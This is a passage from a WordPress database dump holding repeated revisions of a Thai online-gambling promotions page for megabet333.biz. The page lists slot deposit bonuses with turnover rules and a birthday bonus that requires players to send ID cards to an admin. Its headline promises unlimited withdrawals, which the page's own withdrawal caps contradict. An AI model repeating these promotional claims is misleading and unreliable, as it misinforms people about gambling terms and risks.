32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:50:52','2025-10-23 07:50:52','',27,'https://megabet333.biz/?p=76',0,'revision','',0),(77,3,'2025-10-23 07:50:52','2025-10-23 07:50:52','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น:</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น:</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:50:52','2025-10-23 07:50:52','',27,'https://megabet333.biz/?p=77',0,'revision','',0),(78,3,'2025-10-23 07:50:52','2025-10-23 07:50:52','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น:</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น:</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong> เพื่อยืนยันวันเกิด (ข้อมูลถูกเก็บอย่างปลอดภัย)</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:50:52','2025-10-23 07:50:52','',27,'https://megabet333.biz/?p=78',0,'revision','',0),(79,3,'2025-10-23 07:54:14','2025-10-23 07:54:14','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น:</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น:</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong> เพื่อยืนยันวันเกิด (ข้อมูลถูกเก็บอย่างปลอดภัย)</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2025-10-23 07:54:14','2025-10-23 07:54:14','',27,'https://megabet333.biz/?p=79',0,'revision','',0),(80,3,'2025-10-23 07:54:14','2025-10-23 07:54:14','<h1>โปรโมชั่น Megabet333 รวมโปรสล็อต โบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-start=\"346\" data-end=\"760\">ถ้าพูดถึงสิ่งที่ดึงดูดผู้เล่นให้เข้ามาเล่นสล็อตออนไลน์ megabet มากที่สุดก็คงหนีไม่พ้น “<strong>โปรโมชั่นสล็อต</strong>” เพราะเป็นตัวช่วยสำคัญที่ทำให้ผู้เล่นได้ทั้งความคุ้มค่าและความสนุกไปพร้อมกัน เว็บพนันออนไลน์ยุคใหม่จึงแข่งขันกันออกโปรโมชั่นเด็ด ๆ เพื่อเอาใจนักเดิมพันทุกกลุ่ม ไม่ว่าจะเป็นมือใหม่หรือผู้เล่นประจำ ต่างก็สามารถรับสิทธิ์พิเศษได้เต็มที่ ยิ่งถ้าเลือกเว็บที่มีโปรหลากหลายและแจกจริง ยิ่งช่วยให้การเล่นสล็อตสนุกมากขึ้นกว่าที่เคย เว็บพนันออนไลน์ในปัจจุบันไม่เพียงแต่ให้บริการเกมสล็อตจากค่ายชั้นนำเท่านั้น แต่ยังมาพร้อมโปรโมชั่นสล็อตที่ครอบคลุมทุกช่วงเวลา ตั้งแต่สมัครสมาชิก ฝากเงิน ถอนเงิน ไปจนถึงโปรคืนยอดเสีย ซึ่งทั้งหมดนี้ถือเป็นโอกาสทองสำหรับผู้เล่นที่อยากเพิ่มทุนแบบไม่ต้องลงทุนเยอะ แถมยังช่วยให้ปั่นสล็อตได้ต่อเนื่องแบบไม่มีสะดุด</p> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น:</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น:</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"#\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path 